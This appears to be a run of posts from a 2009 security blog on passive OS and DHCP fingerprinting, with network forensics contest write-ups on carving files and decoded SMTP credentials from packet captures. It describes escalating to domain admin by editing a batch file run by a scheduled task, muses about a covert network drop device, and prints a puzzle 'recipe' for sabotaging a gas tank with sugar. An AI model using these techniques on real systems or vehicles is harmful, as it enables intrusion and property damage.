Pull up each file in notepad or your favorite text editor and you'll see file1.txt isn't what we want, but about canceling lunch with someone. File2.txt though appears to have an attachment. Looking through it we can see the answers to some of our questions and we can see what the attachment is:
------=_NextPart_000_000D_01CA497C.9DEC1E70
Content-Type: application/octet-stream;
name="secretrendezvous.docx"
Content-Transfer-Encoding: base64
Content-Disposition: attachment;
filename="secretrendezvous.docx"

We could just copy/paste the attachment into a nice web form on google and get it to spit out the file, but that defeats the purpose the exercise (though that is what I did initially to get the answers).

So next we feed it through smtpcat.pl like this:
C:\nft>perl smtpcat.pl -r file2.txt -w dir2

it will create the directory dir2 if it doesn't already exist and drop the attachments found in file2.txt into it.

We also get the following output:
Credentials:
username: sneakyg33k@aol.com
password: 558r00lz

Other info:
From: "Ann Dercover"

To:
Subject: rendezvous

Attachments and other top level info:
Content-type: multipart/mixed
Effective-type: multipart/mixed
Body-file: NONE
Subject: rendezvous
Num-parts: 2
--
Content-type: multipart/alternative
Effective-type: multipart/alternative
Body-file: NONE
Num-parts: 2
--
Content-type: text/plain
Effective-type: text/plain
Body-file: dir2\msg-860-1.txt
--
Content-type: text/html
Effective-type: text/html
Body-file: dir2\msg-860-2.html
--
Content-type: application/octet-stream
Effective-type: application/octet-stream
Body-file: dir2\secretrendezvous.docx
Recommended-filename: secretrendezvous.docx

We now know her username, password, who the email was from and to, along with the subject and the # of parts and what it created. Since there were no suggested names for the plain and html parts it made some up for it.

The username/password were both base64 encrypted. The 2 types of Authentication that we can easily decode are AUTH LOGIN and AUTH PLAIN, both being base64 encrypted, just different formats of storing the data. smtpcat.pl will handle both, even though only one was needed for this.

Here is what we have in dir2:
Directory of C:\nft\dir2

11/28/2009 02:53 PM 87 msg-860-1.txt
11/28/2009 02:53 PM 402 msg-860-2.html
11/28/2009 02:53 PM 207,438 secretrendezvous.docx

Looking at the .txt or .html files (both the same info one just plain text, one html) Ann asks her sweetheart to bring their fake passport and bathing suit to the attached address. Guess we need to go look at the .docx file.

Opening up the .docx file in OpenOffice we see that it is a picture of google maps telling where to meet. Running an extraction on the .docx file we can go to the word\media directory and find the attached image called image1.png. Do an md5sum on that file and on the original .docx file to get the md5's for them.

Again smtpcat.pl could be cleaned up a bit to add more stuff and be written cleaner, but for what was needed here this worked great. Using pcapcat.pl worked in this example, but as noted before, it does not take into consideration out of order packets, retransmissions, etc, so something else may be needed in "real life", though I still really like it!

Yokoso!

2009-10-30T10:14:00.002-06:00

The first I saw of this was on one of the Twitter posts from someone I follow. This is a sourceforge project.

On a read of the sourceforge page you'll see:
Yokoso is a project geared toward fingerprinting infrastructure. Yokoso will determine what web interfaces are available on a specific network.

But based on the net-security article it is a bit more. First it tries to exploit your browser, goes through and finds out what sites you may have admin rights on, and then does some type of fingerprinting.

I'm going to try to find some time in the next week or two to test this out, if/when I do I'll post back my results. It looks promising, but anything doing browser exploits makes me nervous.

DHCP Fingerprint Manager updated

2009-10-29T15:46:00.004-06:00

New release of DHCP Fingerprint Manager (1.00.01) released earlier today. In earlier versions you had to export the data out of wireshark in a text format and it would read that in and DHCP Fingerprint your data, in the latest release it now reads in .pcap files.

I've mentioned some of the features of this program before, that I'd love to steal and add into Satori, but I'll probably never get around to it. I love the statistics feature when it is done! It also gives you the ability to update the fingerprint data and then reparse the data from the pcap file and get the new fingerprint for the device if it happens to have changed.

Check it out and give him some feedback on the product when you get a chance.

Update (note from the author):
Note that open/save handles user data in XML format. It contains end-systems and fingerprints (content of both tabs).
The import function allows to get end-systems for DHCP trace (*.txt or *.pcap or *.cap) and to get fingerprints.
Note that fingerprints are "imported" by default when creating a new data file.

Here is a quick link to the program.

Network Forensics Challenge #2

2009-10-24T15:12:00.003-06:00

They are at it again, we barely got the answers for #1 and #2 got put up a few weeks ago. I did it originally within ~30 mins using the web, wireshark and a few other local programs on my machine. But I wanted to stand a chance of actually winning this time, so instead of just sending them the answers I actually started writing a few .exe programs to parse the data out. I have/had them done and then decided I better do something I was willing to share the source code on, so I wrote out a perl script.

Perl is not something I ever work in, have only done it a few times before, so it was a bit painful to do, especially coming from a Pascal background and not a c one! if statements and eq vs = and other little gotchas killed me today, but after about 4 hours or so I came up with a 258 line .pl file that parses it out nicely. There is a lot more I could add to it, but since I'm by no means a perl programmer and my hands are cramping up typing this as it is, it was time for a break and time to call good enough good enough!

I'll release the script after the deadline if i'm not picked as a finalist and it is added to their site.

This was another fun project to work on and it forced me to dig into a programming language I should have learned long ago, but never have. So always good to expand your knowledge some.

Small Linux Devices

2009-10-14T10:37:00.002-06:00

Just a followup on the Wall-Wart type linux devices, something new came out.

If you thought the last one was small, then check this out. There are advantages to the Wall Wart design (usb to add wireless or a 2nd nic, etc), but if you are just looking at size this thing is great. Not sure if it is POE or how they power it, didn't look into details.

SANS Reading room

2009-10-07T07:46:00.005-06:00

Not sure how new the article is based on the fact that all referenced material is from 2002 or before, but here it is. It is about using Telnet Negotiation Data to passively fingerprint a system.

Being that telnet isn't used much anymore, it may be a little dated now, but it popped up in my Google Alerts, so figured I'd at least put it here so I could find it easier in the future if need be.

While looking around SANS reading room I also came across this article which also appears to be dated, but still somewhat useful. It is about using passive fingerprinting to audit and discover network vulnerabilities.

Network Forensics Contest Results

2009-09-26T10:48:00.004-06:00

A month or two ago philosecurity.org started a nice little Network Forensic contest. It wasn't too hard and wasn't too easy. It gave me a chance to parse through some traffic and see what was going on. Then to carve a file out of a packet capture, using some of the SANS 508 stuff I learned awhile back before I picked up my GCFA cert.

The original puzzle can be found here and then again here when SANS decided to sponsor it and give an On-Demand course away for the winner.

Well happy to say I at least got everything right, though I didn't win, nor was I one of the finalists. All of the finalists scripted out a way to answer the questions, or had one program that did it all (or most of it). The results can be found here.

Erik Hjelmvik, author of NetworkMiner, who is using some of the tcp and dhcp fingerprinting stuff from Satori was one of the finalists and implemented some new stuff in 0.89 to become a finalist, though not a semifinalist since it wasn't all scripted out either. (When I used NetworkMiner to parse it out, it was only version 0.88, Erik hadn't released 0.89 until after I put my submission in).

From a straight Network Forensics standpoint I understand why they wanted it scripted out, but from understanding how to actually do it I'm glad I didn't depend on an automated program to do it (granted each of the finalists I believe had to write their own programs to do this). If you understand how to carve the data out then you can do this with pretty much any data, if you depend on a utility to do it, you may have to wait for updates to it if/when things change.

Ultimately I just wanted to make sure I could do it and am happy that I got it done and answered correctly. I was more interested in it from fingerprinting stand point anyway and spent more of my time on seeing what else was on the network!

If anyone wants to do it, the puzzle and pcap files are still out there!

Here was my submission and all my notes (again I was interested in the rest of the network):

Answers:

1. Sec558user1
2. Here's the secret recipe... I just downloaded it from the file server. Just copy to a thumb drive and you're good to go >:-)
3. recipe.docx
4. 50 4B 03 04
5. 8350582774E1D4DBE1D61D64C89E0EA1
6. Recipe for Disaster:

1 serving
Ingredients:
4 cups sugar
2 cups water
In a medium saucepan, bring the water to a boil. Add sugar. Stir gently over low heat until sugar is fully dissolved. Remove the saucepan from heat. Allow to cool completely. Pour into gas tank. Repeat as necessary.

How I got there:

Tools Used:
Satori - http://myweb.cableone.net/xnih - Passive OS Fingerprinting
NetworkMiner - http://sourceforge.net/projects/networkminer/ - Network Forensic Analysis Tool, used for cookie stuff and a few other sanity checks
FrHed - http://frhed.sourceforge.net/ - used to Hex Edit the file to remove the initial stuff prior to the magic number
Wireshark - http://www.wireshark.org - view and export pcap file
HashGenerator - http://pagesperso-orange.fr/cycocrew/delphi/applications.html - computer hashes
Google of course to find some of the other info
----

Writeup:
I started with 2 programs, one I wrote geared completely towards passive OS fingerprinting, Satori, and the other program NetworkMiner which I've worked with the developer on a little in the past. Using Satori I mapped out the machines identified in the packet capture and got an initial layout of the network. Determing which systems did what on the network. Then feeding the capture through NetworkMiner I was able to get some of the initial Clear Text information that was going on between clients. Once I had a better idea of what type of data was in the capture I started picking away at it with Wireshark.

Knowing Ann's IP it was easy to get started in wireshark with a simple filter of (ip.host == 192.168.1.158). With this in place and scanning through the packets for anything out of the ordinary in the hex window. Basically I knew there had to be some type of clear text conversation going on due to what NetworkMiner had seen. We see Ann's computer is talking to a 64.12.24.50 (bos-m013a-sdr3.blue.aol.com). Since it is an AOL server it is probably AIM being used, but I did not verify that. The information looks to be SSL based on the destination port, but ends up being in clear text. I assume this was an attempt to get past any egress filtering, but didn't dig into it since that wasn't requested at this time.

Identifying who she was talking to was fairly simple, and digging into whatever protocol the chat program she was using would have probably been a good idea. Based on other things I saw she appears to be comunicating with Sec558User1.

Eventually she transfers the file to the other user at computer 192.168.1.159, which appears to be a Windows XP box. Depending on your env this may be a dead give away that you are having issues. Looking at the other systems on this network they all appear to be Linux Boxes, so a new rogue XP box sticks out like a sore thumb. Something like packet fence which does DHCP fingerprinting may be useful to block computers like this off their network or at least make it a little harder for them to get a valid IP and use the network.

In packet 92 we see the beginning of the file transfer. Sending the file recipe.docx

The rest of the file transfer which starts in about packet 109 where we are able to right click on it and do "Follow TCP Stream". This shows both directions of traffic. Next we need to go to the bottom and filter by 192.168.1.158 --> 192.168.1.159, getting just the data that Ann's computer is sending to the XP box. Select Raw and do a Save As. This will save "extra" info in the file, which we will need to remove based on some file carving next.

We now know, or appear to know the type of file it is based on the file name above. We need to look up that magic number. A docx file really is a zipped file so it has the same magic number which is: 50 4B 03 04 14 00 06 00

We now open up the file we saved in a hex editor and do a search for the above magic number. Once we find it we delete anything prior to it and resave the file. There is always the chance that there will be extra junk at the end too that may need carved off.

After that, we can open up the file with OpenOffice or Microsoft Word and see what the data is. We could also unzip it instead and look at the .xml files generated if we need to find out more about the initial file.

Run the file through your choice of md5sum programs and you should be good to go.

-----

Below is the notes I took while I went through the system, typically wouldn't put them in a report, but there was a few interesting pieces of info in there I found.

Extra info and general notes on systems on the network and what they appear to do:

192.168.1.2 - Linux 2.6 possibly, limited info, did what may have been a scan of 192.168.1.157. Connected on port 80, but just did a handshake and said goodbye, no header info exchanged.
192.168.1.10 - default gateway I assume
192.168.1.30 - NTP Client Box, running SSH server (192.169.1.2 connected to it)
192.168.1.157 - running Samba 2.2.7 - 3.0.x client (actually 3.2.0, need to update Satori)
print queue
HTTP Server, or at least port 80 is open
Herbivore/SANS
192.168.1.158 - Linux 2.4 or 2.6 box, packet 92 starts sending recipe.docx, packet 112 using cool filexfer sends it also
NTP Client
Talking to 64.12.24.50, most likely sec558user1
FTPs file to 192.168.1.159, syn comes in in packet 109
192.168.1.159 - Windows XP, 2000 or 2003 box (XP based on Web)
talking to 64.12.25.91
downloads zip file of smiley faces from 205.188.13.12
goes off to at.atwola.com, requesting DNS info for them after download of resume.doc
pulled file (httpget) with: (removed since it was actually linking to the ad in this post!)
pulled file (httpget) with: (removed since it may have linked to ad also).
"username" on cookie: JEB2=4A839DDB6E65181C45921CB2F00016D8; ATTACID=a3Z0aWQ9MTU4NzdpYTAwYTh2Ymk=; ATTAC=a3ZzZWc9OTk5OTk6NTAyODA=; badsrfi=V0d710994e8ccb8db64a83a07939b2; atdemo=a3ZhZz1hbTM6dWEzOTtrdnVnPTE7; AxData=; atdses=0
atwola.com appears to be "spyware/adware" based on a quick search

External Hosts
64.12.24.50 - bos-m013a-sdr3.blue.aol.com
64.12.25.91 - bos-m007c-sdr4.blue.aol.com
64.236.68.245 (dns requested info by 192.168.1.159)
64.236.68.246 (dns requested info by 192.168.1.159)
205.188.13.12 - no DNS entry, only talking to 192.168.1.159 via SSL), downloaded a zipped file of smile faces and their manifest.
10.1.1.20 - DNS server, NTP Server

Clear text data, (192.168.1.158 to 64.12.24.50) (owned by AOL, so possibly AIM traffic)
E4628778....Sec558user1
Here's the secret recipe... I just downloaded it from the file server. Just copy to a thumb drive and you're good to go >:-)
E4628778....Sec558user1*..c.z.........
G7174647....Sec558user1.......R..7174647..F.CL...."DEST.......................F.........'...........recipe.docx.*.V......
G7174647....Sec558user1*.V..{.......*..
7174647....Sec558user1..............J.H.........+..1n....+...O............J.........7174647..F.CL...."DEST.......*.V..".......*.1...........
Sec558user1..*.V..........*.y..N....w...
Sec558user1..............J.H.........+..1n....+...O............J......a........X....< HTML >< BODY >< FONT FACE="Arial" SIZE=2 COLOR=#000000>thanks dude< /FONT>< /BODY>< /HTML >.
......+..1n....+...O.........*.V..".......*.............Sec558user1..*.V..........+.Q.....L.....Sec558user1..............J.H.........+..1n....+...O............J......s........j....< HTML >< BODY>< FONT FACE="Arial" SIZE=2 COLOR=#000000>can't wait to sell it on ebay< /FONT>< /BODY>< /HTML >
............Sec558user1..*.V..".......+.............Sec558user1..*..d.".........H...........Sec558user1..*..e.J.........
I5088496....Sec558user1..."................see you in hawaii!....*..f.".........J...........Sec558user1..*.V......

DOCX (zip) Magic Number:
50 4B 03 04 PK..
ZIP PKZIP archive file (Ref. 1 | Ref. 2)
Trailer: filename 50 4B 17 characters 00 00 00
Trailer: (filename PK 17 characters ...)
DOCX, PPTX, XLSX Microsoft Office Open XML Format Document
JAR Java archive; compressed file package for classes and data
SXC, SXD, SXI, SXW OpenOffice spreadsheet, drawing, presentation, and text files
WMZ Windows Media compressed skin file
XPI Mozilla Browser Archive
XPT eXact Packager Models

50 4B 03 04 14 00 06 00 PK......
DOCX, PPTX, XLSX Office 2007 documents

Use Follow TCP Stream, just get one side of converation. Save as Raw. Lookup "magic number"
Search for it in Saved file. Delete everything prior to that and resave, get:

Recipe for Disaster:
1 serving
Ingredients:
4 cups sugar
2 cups water
In a medium saucepan, bring the water to a boil. Add sugar. Stir gently over low heat until sugar is fully dissolved. Remove the saucepan from heat. Allow to cool completely. Pour into gas tank. Repeat as necessary.

Hash on the File is:
8350582774E1D4DBE1D61D64C89E0EA1

Updated Fingerprint Programs

2009-09-24T19:30:00.005-06:00

Jeff has done a great job making it easy to update the different xml files I use in Satori, along with the ability to have an underlying repository that helps keep everything the same across all of the files! He's also written a nice DHCP Fingerprinting program himself. These can be found at Devonic Delphi Page

DHCP Fingerprint Manager: imports text-based Wireshark traces to populate and fingerprint systems. Basically, you take a pcap file, parse out just the DHCP packets and export to a text file. You then dump that in and dhcp fingerprint the systems.

It is a lot faster than Satori and it gives you a lot of nice features after you are done. The Statistics is a wonderful little chunk of it you can do after reading in a file. I may have to steal some ideas from him on this! In the statistics area it breaks down % of End Systems by MAC Vendors, Fingerprint Names, Fingerprint Match Scores, OS Names, OS Classes OS Vendors, Device Types, Device Vendors, and then the Authors of the individual Fingerprints.

Fingerprint Editor: The program I use all the time these days to modify the different xml files that Satori and these different programs are using. I used to always do it by hand, but inevitably I always missed updating something. It was nice to have this to help keep things in sync, update the time stamps, etc! If you are creating fingerprints to send me, and not just sending me the raw data, this is the perfect program to use!

There is also DEF File Editor that modifies the definition files the programs above use.

He has quite a few other nice programs out there, and if any of you are delphi programs check out his Delphi Components page. I used a few pieces from there myself.

Gaining ground?

2009-09-11T17:37:00.002-06:00

2 blogs talking about DHCP fingerprinting in 2 days, not bad. The 2nd one may have been inspired by the first since it links to it, but it also has a link to my BH briefing, so hey, I can't complain.

Meraki did the first one yesterday. (I love Google Alerts) I've tried to contact Hans about what they are doing (option55 data only, or more like I'm doing with the dhcp.xml file), so far I haven't heard anything back, but it was a Friday. We'll see if I get any response or not. If anyone has a POC for Meraki maybe check into it for me.

The second blog was from coova.org. They have a link to David and my Blackhat Presentation from 2007 for those that haven't looked at it before. He mentions a product CoovaRADIUS which I hadn't heard of before (nor had I heard of Meraki for that matter). It appears CoovaRADIUS can do dhcp fingerprinting via CoovaChilli. They appear to be using the packetfence data, so just option55 without taking into account if it is a Request/Discover/Offer/Inform/etc packet. May have to try to get a hold of the developer there too and see if they are interested in trying to use the dhcp.xml file. Always good to get more people using it, thereby expanding the database as more people have access to more devices.

Great Dataset to parse through by ITOC

2009-09-07T10:59:00.005-06:00

ITOC has a great set of data to parse through for those that are interested:
http://www.itoc.usma.edu/research/dataset/index.html

Just over 8 GB of data between inside/outside captures.

They also have a blog setup:
http://datasetsfortheresearchcommunity.blogspot.com/

I'm hoping for some more information on exact OS's being released so that I can take the data that Satori spit out and use that to extend the fingerprints on FreeBSD and possibly some of the other OS's seen on the network. I'd hate to just take and put it under the generic FreeBSD if we can tell for sure it was 7.0 or whatever.

Satori already has ID'd the systems, quite well from their initial diagram, but it would be nice to know for sure that it is correct before extending some of the fingerprints!

One problem I'm having it is takes forever to go through 1 GB files with Satori. Some of it has to do with the amount of "stuff" I've added to it, but that is just a lot of data to parse too! Oh well, 1-2 hours per file, come back, see if it blew up, etc. (Update: Make that 1-2 hours on the 100 MB files, not sure how many days to get through the 1 GB files!) This data set at least gave me some new packets that I hadn't seen before that caused some problems, so I updated a few of the dlls to handle vlan traffic in them. I was feeding it in, just not parsing it correctly!

Telnet Recon

2009-08-22T13:17:00.002-06:00

Google Alert just popped this up on a program called telnetrecon. Telnetrecon is just that a recon program for the telnet service. It appears to be an active scanner. I have very few devices/systems with telnet open these days, so it isn't something I've tried out. If anyone runs it let me know any feedback you have or feel free to add a post.

Looks like it was initially released about a year ago. Not sure how much additions have been done to it. Something that may come in useful to do some testing though.

Sayings that drive me crazy

2009-08-12T22:55:00.003-06:00

Ok, nothing to do with OS Fingerprinting, but I've seen this comment twice this week and it drives me nuts:

"Either way, ESX is just software and can suffer from
vulnerabilities just like any other piece of software."

Yes, 100% true, the above was when I asked if VM Escape had actually been shown in ESX, not just workstation/server. Earlier this week, someone else said the same thing on a different security list in regards to trunked VLANs into an ESX box and that trusting VMware to do it in ESX was crazy and you should use a real Firewall because "ESX is just software... and has vulns in it".

What do these security people think runs firewalls? Lets see, Cisco device runs IOS, IOS is software! Better yet, Network Engineers put rules in FWs, NEs get lazy sometimes and put bad rules in them.

Give me a break, YES ESX is software, YES software has vulns in it, but everything we do on these lovely pieces of hardware we are sitting at requires software to run. Even to boot them up there is software. What do you think the BIOS is!

Ok enough ranting, but next time you hear someone say "It is just software, so it has vulns in it" smack them upside the head for me!

ICMP OS Fingerprinting

2009-08-12T09:30:00.007-06:00

Quite honestly I thought ICMP based OS Fingerprinting was dead and had been for years now that almost all OS's default to running a firewall! I was quite surprised to see that NetScanTools Pro has an option in it to still do this.

Happened to pick up an article from Laura Chappell, which had a link to this quicktime audio: http://www.screencast.com/users/laurachappell/folders/Media%20Roll/media/75047d06-2801-49b7-87d3-0e41a3abd500

NetscanPro appears to be doing the standard:
ICMP Request
Timestamp Request
AddressMask Request
Information Request
ICMP Request (Code <> 0)
TOS and Precedence

Without going back and reading Ofir's paper again, or looking at my old ICMP program I'm not sure if any of them are new from what Ofir presented in his paper back in 2001 "ICMP Usage In Scanning" or not. I wonder if LNSS is still using the the Code <> 0 test at all?

ICMP fingerprinting seems about the same as before. Useful in some cases, not so useful in others. It is good to see that it is still being used and therefor some new database has probably been made.

Out of the 4 main types of devices on my network it identified them as [Actual - Identification}:
Netgear WAP - HP Procurve Switch 2500 Series
Brother Printer - Unable to identify operating system.
Linksys VOIP Device - HP LaserJet 2800 Series
XP - Windows XP responding to Ping only

Ok, I had my box crash twice while doing OS Fingerprinting with this. It could be a problem on my box or it could be a bad dissector on their end. Will follow up with them. [note: Kirk was quick on responses, looks like it was probably in WinpCap since the BSOD pointed at npf.sys, trying to duplicate on another system, may also be a NIC driver combination, looking into it, but doesn't appear to be NetScanTools related]

Anyway, out of 4 devices it could ID 1 correctly. Any fingerprinting program is only as good as its DB, so maybe I'll have to play with it a bit more and send it some new fingerprints if they have the ability to add them. [Note: Looks like the ability to add more will be in version 11, so I'll have to try to follow up with them in the future]

Web Fingerprinting

2009-05-28T08:27:00.003-06:00

Fingerprinting web sites via the Server tag has been done for years (and years and years). Then came fingerprinting it based on the order of responses (httprint). Now something new (or at least new to me) has shown up, fingerprinting it based on certain files on the site.

Article can be found here

In a nutshell:
"What these fingerprints are, depend on the web application, but generally we can use .js (javascript) , .css and a few other files that are available and we can access the source remotely. We can't do the same with .php, because it will not return the source (only the executed output)."

In their example they fingerprint wordpress sites. Interesting new approach.

AD, Scheduled Tasks, and batch files

2009-04-16T20:28:00.003-06:00

Ok, totally off subject for why I started this blog, but....

Was looking at a bunch of Scheduled Tasks on a bunch of servers today, thinking about how, if configured incorrectly, Scheduled Jobs can be a major security hole.

Take for example a scheduled job that accesses multiple systems. Instead of setting up a specific account that has access to only "X" number of systems, a domain admin account is used. There are many things wrong with this scenario, but I've seen it, and I'm sure others have to. On top of this, lets assume that this scheduled job calls a batch file, instead of an exe directly (though this could also be used in this type of attack).

If you go in to modify a scheduled job, the file it points to, the time it runs, etc, Windows prompts you for the password again. All well and good, but instead of modifying the job, you just look to see what it points at and who it is run as.

In this case, a batch file, setup to run as a domain admin. Go in, modify the batch file, put some things like "net user add" in there or your favorite command line utility (for that matter a GUI utility) and go back into scheduled tasks and say run. You've now escalated from a normal user, on this system, to whatever you want! This assumes you have some type of access to the system in the first place and all that goes with that.

Moral of the story:
1. Don't run tasks as Domain Admins, practice the whole least priv ideology.
2. If you must run things via Scheduled Tasks, the files you are calling should be in a directory that is locked down by ACL that only allows the user calling them access to them.

It would be nice if MS added some type of checksum to the files called. When you create the job have it run a checksum against the file it is to run and to verify that each time it runs the process.

The forgotten power of SNMP

2009-04-16T19:54:00.005-06:00

I keep wondering when the next big breakthrough will come and from where. Most protocols have been done, tricks have been played, and now it is a lot of rehashing of old tricks. I'm not saying someone won't come up with something new, because I'm sure they will, I'm just curious when it will happen and how they'll come up with it.

While I'm waiting though, I decided to revisit SNMP capabilities. I still get emails from time to time about the objects_id.txt file that I originally compiled and then updated for Languard Network Security scanner back in 2001. (Or did Bogdan come up with it and I just updated it, sad how quickly the memory goes!)

Anyway, recently our network engineer and I were trying to track down some rough MACs that were infected with DHCPChanger and another box that had Microsoft's Internet Connection Sharing turned on (what a pain that is in a large environment!) There are things that can be done, such as DHCP Snooping on the switch, etc, and that is mostly in place now, but this whole issue got me thinking of how we could do this quicker and easier. Jumping on switch after switch, dumping the MAC table, determine what port it was coming down, remoting into that switch and doing the whole process over again seemed like a waste of time.

Enter SNMP. I had looked at this idea back in 2001, but articles like this, from the vendor weren't readily available. Cisco published this one which helped a lot on trying to figure this out.

Anyway, the idea is simple enough, and I'm sure there are other products out there to do it, but you give it the MAC you are looking for, the IP to start with (probably a nice Layer 3 device at the "center" of your infrastructure) and the public community name and you hit go. Depending on the number of VLANs you have to enumerate, you are looking at 20-30 seconds per device to determine all the ports, neighbors connected via those ports, ip address and desc of those neighbors and all MACs associated with each of the ports. Assuming their is another switch down Port X, snmp walk that device next, repeat and rinse until you get to the end port where that MAC resides. A lot nicer than bouncing through 3-7 devices trying to find something!

Taking that of course to the next level is to build a tree of all devices, pulling their object ids, system descriptions, etc. Start at device 1, anywhere in the infrastructure, query it, ask it about its neighbors, query each of them in turn, walking round and round until you've mapped it all out.

Tracking the MAC back to a specific port is pretty much done, nothing pretty, but it works. Building the map is all in my head, but the ground work is laid out in what I've already accomplished, so now I just need some free time to code! Only thing still to figure out is what happens, or how to detect, redundant links. Don't want to start a loop, walking down the port I just came from, or if multiple paths exist, wandering back down to devices I've already scanned. All doable, just have to sit down and think about it.

Again, nothing ground breaking here, just finally getting back to a project we talked about in the 2001-2002 era, but didn't have enough info on how vendors were storing info via SNMP. Oh, and for initial release, if that ever does happen, it will probably only work on Cisco devices, since that is all I have to play with.

Satori - Linux Version Part 2

2009-04-07T20:36:00.001-06:00

Ok, officially have links on my website for the linux version of Satori. Made some bug fixes from the initial release to get around 256 char strings in fpc that I had forgotten about.

Added a few more command line options, updated the dhcp.xml file, etc.

Version 0.1.1 is now out there for anyone that is interested.

Satori, Linux version

2009-03-22T16:30:00.002-06:00

Ok, been busy working on a command line version of Satori for Linux. There are certain functionality in the cmd line version that I will not try to replicate that are in the windows version. Since I'm just doing output to screen an overall score and some of the other things, such as ICMP sequence differences will not be there.

So far I've ported the DHCP, TCP, p0f and ettercap stuff over.

It is written in free pascal (fpc) with the lazarus IDE. Ultimately my goal is to get as much of it over to Linux as possible and most likely to rewrite the whole thing in fpc so that I can have a GUI version on both windows and linux.

Main reason I'm writing it for Linux is so I can play with it on the wall-warts I wrote about a few weeks ago. Assuming I have some extra cash I'll probably be ordering one in the near future. This will require me to compile it for ARM also, hopefully all goes well!

If anyone wants a copy, let me know.

Trojan.Flush.M and DHCP

2009-03-17T10:59:00.004-06:00

Symantec has a nice writeup on this, it is a few months old, but a new variant appears to be running around now.

Now from an identification prospective, DHCP fingerprinting comes in quite nicely here! I was able to get someone to send me a packet capture of DHCP Offers and ACKs from an infected machine on the latest variant. I'd like to get a few others also, but have not had a chance to look into it much due to other projects and work.

I'll be adding the fingerprint into the dhcp.xml file here shortly, assuming time permits. If anyone has packet captures from other variants of this trojan, or others that are doing dhcp offers/acks, please email them to me.

Cool little device

2009-02-25T11:52:00.003-07:00

Ok, nothing to do with OS Fingerprinting, but since I've been looking into Pentesting so much lately also, when I saw this post earlier today on Twitter by Hal, all I could think of was how much fun one could have with one of these!

http://www.linuxdevices.com/news/NS9634061300.html?kc=rss

These devices are getting smaller and smaller all the time and cheaper and cheaper.

I'm waiting to see one with two ethernet ports on it, basically an internal switch so that you can drop one of these behind someones desk, plug their computer feed into your device, a short cable from the device to their computer and then have this thing phone home and open some type of door for you.

As it is now that could still be done easily enough with it, but you also have to find a network port that is live. Adding the internal switch would just make things easier.

Insecure Magazine, os fingerprinting and xprobe2

2009-02-24T10:20:00.003-07:00

The latest version of (in)secure was released here recently. The first article this month was on using a new version of xprobe2 to do fingerprinting. Sounds like some new features have been added and some cleanup has been done.

Looks like the next release is due out in June of xprobe

EDHCPFingerprint & EFFormat

2009-02-22T19:22:00.003-07:00

Both programs from enterasys have been updated again! They've been busy. Main change I know about is a repository.xml file that is generated. It looks to see what names show up across multiple .xml files (tcp, mac, dhcp, smb, etc). It was a very useful feature in cleaning up some of my files. Some of which I'm not even using yet, but that I've been adding to from time to time in the past and hope to use in the future!

I've pretty much started using EFFormat full time now in editing my fingerprint files!

As always, they can be found here at enterasys

Updated Software

2009-02-22T19:17:00.002-07:00

Satori updated to version 0.62. Lots of new fingprints added and others updated. Took like Linux distro's and combined them where it made sense instead of having 5 fingerprints that were all the same because they were based on the same distro. Also added the packetfence fingerprint info back into my dhcp.xml file. We'll see if the packetfence project starts using the .xml file or not, it has been discussed in the past and may be being looked at again. We'll see.

With the addition of these fingerprints back into dhcp.xml I decided to give the user a few more options in parsing dhcp fingerprints. You'll find it under options. I also added a new feature for arp parsing also since it was in an 'addon' dll instead before. Now it is just an option.

Last major change was an update program. It is a stand alone program that will update the .exe, .dll, and .xml files. It is nothing fancy, but it gets the job done. It will let you keep up to date on the latest fingerprint files, dll's, etc without me having to do a full new .zip file!

EDHCPFingerprint & EFFormat

2009-01-10T08:05:00.005-07:00

As mentioned previously we've been busy recently on the fingerprint files. Jeff of enterasys has been quite busy on 2 programs this past month.

EDHCPFingerprint - reads in the dhcp.xml file and an exported tcpdump file of bootp packets in text format and will determine the OS based on that. It also has some other cool export features.

EFFormat - reads in all the .xml files that I have built for satori (some that I'm not even using yet) and allows you to modify them. I have a built in version in Satori that sorta did this, but nothing as nice!

Both programs can be found at Enterasys Tools page.

Due to all the recent work on these files we of course found and cleaned up a lot of old fingerprints that were inaccurate or did not provide enough info anymore. There has also been a few new fingerprints added. So the fingerprinting based on DHCP should be more accurate.

EDHCPFingerprint

2008-12-24T08:44:00.003-07:00

Jeff from Enterasys has been working with me and Erik (author of NetworkMiner) on tweaks to the dhcp schema. A lot of it was changes they wanted to see done to help extend it out. I was just the middle man since I own the file! :)

These changes will come in quite useful, in different ways, to all of us and I'm glad they were made. Hopefully we've finished for now with the latest change being done earlier this morning.

In the near future, hopefully I'll start leveraging the new info included in it better. Just need time!

Anyway, check out EDHCPFingerprint if you get a chance.

Updated Software

2008-12-17T21:04:00.004-07:00

NetworkMiner -
Ok, been spending a lot of time trying to crash NetworkMiner for the author. Found a nice little bug he had going and a quite a few crashes. All of those are fixed in 0.87 which was recently released. If you are using NetworkMiner I highly recommend updating to the latest version to fix the nasty little bug earlier versions had on saving files.

Satori -
also been spending a lot of time with Erik, author of NetworkMiner, and Jeff (from a private company) on updating the dhcp.xml file schema. Jeff had a lot of good recommendations and has provided a few new fingerprints. Between the 3 of us we updated the schema to a very good 1.0 version I think. I may do an overhaul of it a year or two down the road to add some other functionality into it, but we'll see. Anyway, the new version allows us to group Devices much nicer than before. For Satori it will give me the ability to group Devices across fingerprinting files (dhcp, icmp, tcp) since all 3 have been updated to the new format. Not sure when I'll add the functionality to utilize it, but it is updated along with the removal of a lot of old information in the dhcp.xml file that came from the packetfence.org project. It was nice to have at one point, but since they do not track if it is a dhcp inform/discover/request packet, it doesn't do me any good anymore, so it was removed, along with some other fingerprints I got from files around the same time and did not get everything I needed!

Always looking for new fingerprints. And on that note, I setup an account dhcpfingerprints [AT] gmail.com specifically for fingerprints, originally for dhcp ones (since that is how most people keep finding out about Satori), but will probably use it for all fingerprints.

Twitter

2008-11-15T09:24:00.004-07:00

Well finally decided to setup a twitter account. Long story short, someone got a hold of me mentioning my DHCP paper, he was one of the original authors from KU on it and mentioned my paper was mentioned by yet someone else on twitter. Decided it was time to check it out.

My site probably will never see postings, but who knows. I'm basically just using it to follow some other sites, which I could probably do via other means, but....

Active AP 802.11 Fingerprinting

2008-11-08T20:26:00.002-07:00

Toorcon recently seems to have had a presentation on Fingerprinting APs to see if they are ones you should trust. (Click on the Title to see it)

Some interesting tests by tweaking flags sent and doing clock skew tests. Looks like it may have also been presented at Blackhat and ShmooCon also this year.

The presentation material for Toorcon seems to be a little longer than the ShmooCon one, though ShmooCon's seems to have a few different slides in it. Didn't go looking for it at Blackhat.

Makes me think I should work on getting Satori to be able to use my AirPCap adapter and start working at breaking down those 802.11 packets!

Advanced application level OS fingerprinting

2008-11-08T20:18:00.004-07:00

